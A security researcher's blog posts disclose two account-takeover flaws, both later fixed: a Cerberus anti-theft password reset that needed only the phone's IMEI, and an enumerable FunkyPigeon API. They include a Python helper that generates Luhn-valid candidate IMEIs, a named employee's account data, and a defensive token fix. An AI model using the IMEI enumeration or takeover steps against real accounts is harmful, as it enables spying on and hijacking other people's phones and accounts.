You could, but that would take a while, and Cerberus have made it much easier for us. When you reset your password via the Android app, it sends a request with only your device ID (IMEI) and new password – there’s no username or old password to verify who you are. Once you’ve updated the password for the account associated with that device, you can log in via the Cerberus dashboard and control the phone as if it were your own. I have successfully tried this out on two of my Android phones with trial accounts.</p> <h3 id="canipreventthis">Can I prevent this?</h3> <p>No. Not until Cerberus fix their systems. If you’re looking for some kind of comfort, it will be quite difficult for an attacker to personally target your device unless they know your IMEI number. They will stand more of a chance if they know your device model and thus only have to guess the 6 random digits, which could easily be done in a few hours. They would then have to somehow tie your username to your real name to identify you. Again, this could easily be done by looking at the account’s e-mail address or cross-referencing information such as your phone’s location, recent SMS messages, etc. If I wanted to snoop on someone I knew used Cerberus, it would only take ~20 seconds alone with their phone to note down the IMEI number and access their account; from there I could view SMS messages, track their location history and record videos.</p> <p>I have e-mailed Cerberus bringing this to their attention but they are yet to respond. I hope this post changes that and they fix it ASAP. I will update this post accordingly.</p> <p><strong>Update</strong>: Cerberus have said this will be fixed in their next version, 2.4, which will be published “soon”. I have downloaded the latest 2.4 beta and the exploit still exists.</p> <p><strong>Update 2</strong>: This has been fixed server-side, props to Luca for fixing it quickly. 
See <a href="https://groups.google.com/forum/#!topic/cerberus-support-forum/H7fuB4TCk8Q">https://groups.google.com/forum/#!topic/cerberus-support-forum/H7fuB4TCk8Q</a> for more info.</p>
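To make the IMEI structure described above concrete, here is a minimal Python sketch – not code from Cerberus or any of the tools mentioned; the Note 2 TAC is the one quoted in the post – that computes the Luhn check digit and generates random Luhn-valid candidate IMEIs for a given TAC:

```python
import random

def luhn_check_digit(body: str) -> str:
    """Compute the Luhn check digit for the first 14 digits of an IMEI."""
    total = 0
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:      # double every second digit, starting from the right
            d *= 2
            if d > 9:
                d -= 9      # equivalent to summing the two digits of d
        total += d
    return str((10 - total % 10) % 10)

def candidate_imeis(tac: str, count: int):
    """Yield random Luhn-valid 15-digit IMEIs for a given 8-digit TAC."""
    for _ in range(count):
        serial = f"{random.randrange(10**6):06d}"  # the only hard-to-guess part
        body = tac + serial
        yield body + luhn_check_digit(body)
```

Because the check digit is fully determined by the first 14 digits, a known TAC leaves only the one million serial values to guess – which is exactly why knowing the phone model collapses the search space.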
    Paul Price paul@darkport.co.uk
  • 24 Oct '13 Funky Pigeon - account take over
  • Funky Pigeon - account take over 2013-10-24


    <p>If you have an account with FunkyPigeon.com then you should be extremely concerned. It is possible for an attacker to gain access to your account, which can contain your address details, recent orders, any uploaded photos, your contacts (and their addresses) and your reminders – all of this information can be changed, as well as your password, e-mail address and “security” question. An attacker could use your account balance to order a card in your name.</p> <div style="padding:20px;background-color:#fafafa;text-align:center;"> <h3 style="margin:0;">This has been fixed, see below</h3> </div> <p>I won’t disclose how this was done, as I’ll give them a chance to fix it first. Below you can see we have found the account of Nina Greaves, who was the "SEO &amp; Internet Marketing Specialist" at FunkyPigeon.com (this information is publicly available):</p> <pre><code>"user": { "account_balance": 0.01, "address_id": null, "auth_token": "", "avatar": "", "email": "nina.greaves@spiltinkstudio.co.uk", "first_name": "Nina", "has_facebook": false, "last_name": "Greaves", "tel": "", "title": "Miss", "user_id": 5 } </code></pre> <p>At this point an attacker could issue an update command to change Nina’s e-mail address and then request a password reset to gain access to her account. If Nina had any balance in her account, an order could be placed in her name.</p> <h3 id="howcanipreventthis">How can I prevent this?</h3> <p>The answer to this is unfortunately <strong>don't have a FunkyPigeon account</strong>. If you already have one then there’s nothing you can do – you’ll just have to wait until they fix it. I have e-mailed Spilt Ink Studio (who own FunkyPigeon) and raised an issue with them, so hopefully it should be fixed pretty soon. Fortunately (somewhat), it’s not so trivial to attack a particular user. For example, you can’t gain access to an account via an e-mail address; you have to know the user’s id beforehand. 
However, as user ids are incremental, it would be pretty easy for an attacker to compose a database of all FunkyPigeon accounts and search upon it.</p> <h3 id="thefix">The fix</h3> <p>The API supports an “auth_token”, which is presumably some sort of session variable for that user. It is returned when you issue a login command; however, it is always blank and isn’t required for subsequent requests.</p> <p>They seem to have around 1.7 million accounts in the database, so a lot of people should be worried. And rightly so. I’ll keep this post updated on any official statement from them.</p> <p><strong>Update</strong>: Funky Pigeon have responded and basically said they will fix it ASAP, although they haven’t given any specific time frames. You would have thought it would be at the top of their priorities. As of 28/07/2013 it still works.</p> <p><strong>Update 2</strong>: This has now been fixed and Funky Pigeon have implemented the use of the auth_token field.</p>
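The auth_token fix boils down to two things: issue an unguessable token at login, and refuse any request that doesn't present a token bound to the target account. A minimal Python sketch of the idea (names and structure are illustrative, not FunkyPigeon's actual implementation):

```python
import secrets

SESSIONS = {}  # auth_token -> user_id, populated at login

def login(user_id: int) -> str:
    """Issue an unguessable session token instead of trusting a sequential id."""
    token = secrets.token_urlsafe(32)  # 32 random bytes; infeasible to enumerate
    SESSIONS[token] = user_id
    return token

def handle_update(token: str, user_id: int, new_email: str) -> bool:
    """Reject any update whose token isn't bound to the target account."""
    if SESSIONS.get(token) != user_id:
        return False  # the vulnerable API skipped this check entirely
    # ... apply the e-mail change here (elided) ...
    return True
```

Contrast this with incremental user ids, where an attacker can simply walk user_id 1 through ~1.7 million; a long random token makes that enumeration infeasible.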
    Paul Price paul@darkport.co.uk